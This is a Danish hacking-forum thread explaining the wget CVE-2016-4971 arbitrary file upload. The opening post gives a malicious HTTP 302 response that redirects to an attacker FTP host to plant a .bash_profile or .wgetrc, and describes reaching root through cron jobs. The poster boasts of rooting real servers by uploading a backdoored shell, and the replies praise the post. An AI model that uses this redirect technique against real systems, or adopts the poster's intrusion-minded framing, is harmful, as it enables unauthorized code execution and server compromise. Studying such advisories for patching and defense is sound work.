CVE Hack servere med wget!
|
23-08-2016, 14:11
(Denne besked var sidst ændret: 23-08-2016, 14:18 af Oᴘɪᴜᴍ.)
|
|||
|
|||
Hack servere med wget!
CVE LINK: https://cve.mitre.org/cgi-bin/cvename.cg...-2016-4971
Jeg vil gerne introducere jer til et relativt nyt exploit som er fundet i wget 1.18 og gør at vi kan uploade arbitrary filer. Dette exploit gør at vi med en kompromitteret webserver kan levere vores angreb. Med dette exploit kan du escalere root hvis wget køres via et root cronjob. Angribern der skal kontrollerer serveren skal kunne få wget til at lave en arbitrary fil med arbitrary indhold og filnavn igennem et HTTP redirect som indeholder FTP serveren så man kan modtage svar fra victim-serveren. For eksempel, hvis angriberen server svarer med følgende reaktion: HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: ftp://attackers-server/.bash_profile Content-Length: 262 Server: Apache wget vil automatisk følge omdirigering og vil hente en ondsindet .bash_profile fil fra en ondsindet FTP-server. Det vil undlade at omdøbe filen til det oprindeligt ønskede filnavn »Safe_file.txt", som det normalt ville gøre, i tilfælde af en omdirigering til en anden HTTP ressource med et andet navn. Denne sårbarhed vil ikke fungere, hvis ekstra muligheder, der tvinger destination filnavn angives som en parameter. Såsom: -O / tmp / output Det er dog muligt at udnytte spørgsmålet med spejling / rekursive muligheder aktiveret såsom -r eller -m. En anden begrænsning er hvis vi udnytter denne sårbarhed kan vi kun uploade vores ondsinde fil til den mappe hvorfra wget blev kørt, eller til en mappe der angives af -P option (directory_prefix option). Den aktuelle begrænsning kunne også omgås ved at uploade en .wgetrc config fil. For at kunne bruge exploitet skal du lave en FTP server og selv skrive din ondsindede version af .wgetrc Har selv skaffet nogle roots over de 4 timer jeg testede ved at smide en backdoored shell op på et russisk forum.
|
|||
23-08-2016, 16:40
|
|||
|
|||
RE: Hack servere med wget!
nice nice, Thx for share :)
|
|||
24-08-2016, 09:46
|
|||
|
|||
RE: Hack servere med wget!
Intrassant og godt skrevet. Tak for det!
Don't learn to hack, hack to learn
|
|||
02-09-2016, 16:42
(Denne besked var sidst ændret: 02-09-2016, 16:42 af iTick.)
|
|||
|
|||
RE: Hack servere med wget!
Ganske interessant.
Det ligner godt nok en google translate af: http://www.openwall.com/lists/oss-security/2016/07/09/5 Sektionen: IV. DESCRIPTION
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
|
User(s) browsing this thread: 1 Gæst(er)